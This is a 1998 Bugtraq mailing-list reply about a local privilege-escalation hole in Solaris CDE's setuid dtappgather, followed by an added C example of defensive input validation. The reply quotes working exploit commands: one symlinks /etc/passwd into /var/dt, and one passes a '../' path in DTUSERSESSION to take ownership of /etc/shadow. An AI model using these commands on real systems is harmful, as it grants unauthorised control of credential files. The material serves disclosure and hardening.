Bugtraq mailing list archives
Re: /usr/dt/bin/dtappgather exploit
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 24 Feb 1998 20:30:20 +0100
I suppose you have learnt about CERT's advisory on dtappgather program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
the exploit is much simpler than that. hey, it's even documented on the man page :-)

Simply

$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow

Anyway, your exploit has an advantage: it works (at least, in solaris 2.5), even after patching CDE according to CERT advisory.

Solaris 2.6 seems to have the right permissions:

/var/dt -> rwxr-xr-x
/var/dt/appconfig -> rwxr-xr-x
/var/dt/tmp -> rwxrwxrwt

--
J.A. Gutierrez So be easy and free when you're drinking with me I'm a man you don't meet every day finger me for PGP (the pogues)
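In both reports above, the setuid dtappgather ends up changing a file that was named through user-controlled input: a planted symlink in one case, a DTUSERSESSION value containing "../" in the other. The following C code is an added example, not part of the original posts and not CDE's or Sun's code; it shows one way a privileged helper can refuse both inputs, and the names session_name_ok, claim_session_dir and try_claim are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* A session name must be one path component: no '/', not "." or "..". */
int session_name_ok(const char *name)
{
    return name != NULL && name[0] != '\0' && strchr(name, '/') == NULL &&
           strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/* Create or reuse base_fd/name for uid:gid; returns a directory fd or -1. */
int claim_session_dir(int base_fd, const char *name, uid_t uid, gid_t gid)
{
    struct stat st;
    int created, fd;
    if (!session_name_ok(name))
        return -1;
    created = (mkdirat(base_fd, name, 0700) == 0);
    if (!created && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW: a symlink planted under this name is refused, not followed. */
    fd = openat(base_fd, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    /* fstat/fchown act on the opened inode, so check and change cannot diverge. */
    if (fstat(fd, &st) != 0 || (!created && st.st_uid != uid) ||
        fchown(fd, uid, gid) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demo: scratch base directory (left in /tmp) with a symlink "planted". */
int try_claim(const char *name)
{
    char base[] = "/tmp/dtdemoXXXXXX";
    int fd, base_fd = mkdtemp(base) ? open(base, O_RDONLY | O_DIRECTORY) : -1;
    if (base_fd < 0 || symlinkat("/etc/passwd", base_fd, "planted") != 0)
        return -1;
    fd = claim_session_dir(base_fd, name, getuid(), getgid());
    if (fd >= 0) close(fd);
    close(base_fd);
    return fd >= 0;
}
```

The base directory itself still has to be writable only by root, as in the Solaris 2.6 permissions listed in the reply; the per-name checks do not replace that.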